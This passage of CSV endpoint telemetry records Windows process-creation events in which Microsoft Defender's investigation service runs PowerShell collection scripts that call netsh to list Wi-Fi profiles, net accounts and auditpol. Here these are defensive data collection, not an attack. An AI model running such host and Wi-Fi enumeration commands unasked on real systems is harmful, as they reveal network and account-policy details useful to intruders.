01:27:35.596290900+00:00,3ae7e4b5-9c9f-4d79-8472-9ce4891f4738,computerpii_0a470890c60768167990033d701e7bd881398861,171835,False,10.7740.19041.1052,False,11540474045175657,,11540474045175671,2021-06-24 01:25:52.279823300+00:00,4400,2021-06-24 01:25:52.279823300+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,4400,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,netsh.exe,netsh.exe,Network Command Shell
+592,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:58.777732400+00:00,12004,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\TEMP\t2nudndd\t2nudndd.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:52.287215900+00:00,6672,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '9c478c54876bdf42dc4cfd9c96683cae55563e9fb457fad8b10c4c90a8d90567')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:58.863702100+00:00,2021-06-24 01:27:35.596927700+00:00,703f41e3-51bd-475a-9219-6d91c3357184,computerpii_0a470890c60768167990033d701e7bd881398861,171842,False,10.7740.19041.1052,False,11540474045175659,,11540474045175672,2021-06-24 01:25:52.287215900+00:00,6672,2021-06-24 01:25:52.287215900+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,6672,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+593,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:58.955982300+00:00,17708,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\TEMP\FilePII_57223d1eb2c7e80fb282a6027be9cd2a399b2ece.tmp"" ""c:\Windows\Temp\t2nudndd\FilePII_8e2e3108f3e44b11cc1d235ffec3bb6e8eb18e38.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:58.777732400+00:00,12004,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\TEMP\t2nudndd\t2nudndd.cmdline""",True,2021-06-24 01:25:52.287215900+00:00,6672,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:59.023397900+00:00,2021-06-24 01:27:35.597163600+00:00,11e6bac2-3cbb-410c-87db-e9be512c744e,computerpii_0a470890c60768167990033d701e7bd881398861,171845,False,10.7740.19041.1052,False,11540474045175672,,11540474045175674,2021-06-24 01:25:58.777732400+00:00,12004,2021-06-24 01:25:58.777732400+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,12004,18560,TerminateProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-24 00:59:44.006936100+00:00,2019-12-07 09:10:35.992536100+00:00,2176,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,0.0,257.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+594,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:59.079508700+00:00,8072,netsh.exe,"""netsh.exe"" wlan show profiles name=chocjaj",PortableExecutable,2019-12-07 09:09:33.990210300+00:00,C:\Windows\System32\netsh.exe,96768,6f1e6dd688818bc3d1391d0cc7d597eb,6b691b06fa865f52c9484ef4f10e2e02ed6d7c3a3f474b8b138a33af7258b2a9,9184e64c36629a1dcef084e19cc3e3bef78f2d7b,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:52.279823300+00:00,4400,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_211f2500aafe8c3a435e856ea4a2d552922ccf4f.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_211f2500aafe8c3a435e856ea4a2d552922ccf4f.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'dd957e11064540b8cf34c19a86f451e4964cd2b223912701bc08567d61375d6c')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_211f2500aafe8c3a435e856ea4a2d552922ccf4f.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:59.126493400+00:00,2021-06-24 01:27:35.597677200+00:00,f1804bb5-ab82-4e84-a506-a3dc15f1ee7e,computerpii_0a470890c60768167990033d701e7bd881398861,171851,False,10.7740.19041.1052,False,11540474045175657,,11540474045175675,2021-06-24 01:25:52.279823300+00:00,4400,2021-06-24 01:25:52.279823300+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,4400,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,netsh.exe,netsh.exe,Network Command Shell
+595,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:59.172204800+00:00,15468,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\TEMP\wyxxxoav\wyxxxoav.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:52.287215900+00:00,6672,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '9c478c54876bdf42dc4cfd9c96683cae55563e9fb457fad8b10c4c90a8d90567')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:59.338168700+00:00,2021-06-24 01:27:35.598187900+00:00,28af006c-424d-40e1-8d86-ded840bf22d7,computerpii_0a470890c60768167990033d701e7bd881398861,171857,False,10.7740.19041.1052,False,11540474045175659,,11540474045175676,2021-06-24 01:25:52.287215900+00:00,6672,2021-06-24 01:25:52.287215900+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,6672,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+596,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:59.359143200+00:00,20880,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\TEMP\FilePII_10a11bd9a861840212b983fb028da44482cc051e.tmp"" ""c:\Windows\Temp\wyxxxoav\FilePII_9429542458c0caea5ee92881640f03e19bef326b.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:59.172204800+00:00,15468,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\TEMP\wyxxxoav\wyxxxoav.cmdline""",True,2021-06-24 01:25:52.287215900+00:00,6672,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:59.389551900+00:00,2021-06-24 01:27:35.598282500+00:00,a337849a-0e58-4889-8f33-30faba779cc2,computerpii_0a470890c60768167990033d701e7bd881398861,171858,False,10.7740.19041.1052,False,11540474045175676,,11540474045175677,2021-06-24 01:25:59.172204800+00:00,15468,2021-06-24 01:25:59.172204800+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,15468,16512,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-24 00:59:44.006936100+00:00,2019-12-07 09:10:35.992536100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,0.0,257.0,0.0,1.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+597,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:59.403639800+00:00,18936,netsh.exe,"""netsh.exe"" wlan show profiles name=LFS-Employees",PortableExecutable,2019-12-07 09:09:33.990210300+00:00,C:\Windows\System32\netsh.exe,96768,6f1e6dd688818bc3d1391d0cc7d597eb,6b691b06fa865f52c9484ef4f10e2e02ed6d7c3a3f474b8b138a33af7258b2a9,9184e64c36629a1dcef084e19cc3e3bef78f2d7b,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:52.279823300+00:00,4400,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_211f2500aafe8c3a435e856ea4a2d552922ccf4f.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_211f2500aafe8c3a435e856ea4a2d552922ccf4f.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'dd957e11064540b8cf34c19a86f451e4964cd2b223912701bc08567d61375d6c')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_211f2500aafe8c3a435e856ea4a2d552922ccf4f.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:59.455505700+00:00,2021-06-24 01:27:35.598773600+00:00,a2d85bc2-4320-48b5-91ee-3b07977ac0c9,computerpii_0a470890c60768167990033d701e7bd881398861,171864,False,10.7740.19041.1052,False,11540474045175657,,11540474045175678,2021-06-24 01:25:52.279823300+00:00,4400,2021-06-24 01:25:52.279823300+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,4400,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,netsh.exe,netsh.exe,Network Command Shell
+598,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:59.600962800+00:00,19592,net.exe,"""net.exe"" accounts",PortableExecutable,2019-12-07 09:09:33.990210300+00:00,C:\Windows\System32\net.exe,59904,0bd94a338eea5a4e1f2830ae326e6d19,9f376759bcbcd705f726460fc4a7e2b07f310f52baa73caaaaa124fddbdf993e,88b101598cc6726b7a57d02b1fa95be1b272a821,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:52.287215900+00:00,6672,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '9c478c54876bdf42dc4cfd9c96683cae55563e9fb457fad8b10c4c90a8d90567')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:59.615061500+00:00,2021-06-24 01:27:35.599888+00:00,b294f7d0-f020-44b5-9b76-417a8d0be190,computerpii_0a470890c60768167990033d701e7bd881398861,171877,False,10.7740.19041.1052,False,11540474045175659,,11540474045175679,2021-06-24 01:25:52.287215900+00:00,6672,2021-06-24 01:25:52.287215900+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,6672,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,net.exe,net.exe,Net Command
+599,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:26:00.376980900+00:00,4008,identity_helper.exe,"""identity_helper.exe"" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,2987170515631334499,3695594818534080064,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5704 /prefetch:8",PortableExecutable,2021-06-18 23:49:38.664048500+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\91.0.864.54\identity_helper.exe,1080720,33098278b86f6e967f5e0f66da8192fa,dbe0ea072c1e26f07ae34f6b721074635048644ef14fce622e4097f05b6684c2,c345ea4721c3bafc8f7592f97f0407541b464904,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:20.669190100+00:00,15088,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:26:00.390617800+00:00,2021-06-24 01:27:35.634323700+00:00,e32b6c1d-4515-4126-985c-1f3f9081fcdc,computerpii_0a470890c60768167990033d701e7bd881398861,172061,False,10.7740.19041.1052,False,11540474045175158,,11540474045175697,2021-06-24 00:52:20.669190100+00:00,15088,2021-06-24 00:52:20.669190100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,15088,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 01:16:40.091697100+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,,Microsoft Edge,91.0.864.54,PWA Identity Proxy Host,identity_helper.exe,PWA Identity Proxy Host
+600,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:26:01.339153500+00:00,3380,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce923f-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:52.287215900+00:00,6672,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '9c478c54876bdf42dc4cfd9c96683cae55563e9fb457fad8b10c4c90a8d90567')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:26:01.372112100+00:00,2021-06-24 01:27:35.635800500+00:00,33e71de8-0542-4aca-8acb-eae4a9e4a2df,computerpii_0a470890c60768167990033d701e7bd881398861,172077,False,10.7740.19041.1052,False,11540474045175659,,11540474045175699,2021-06-24 01:25:52.287215900+00:00,6672,2021-06-24 01:25:52.287215900+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,6672,2176,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
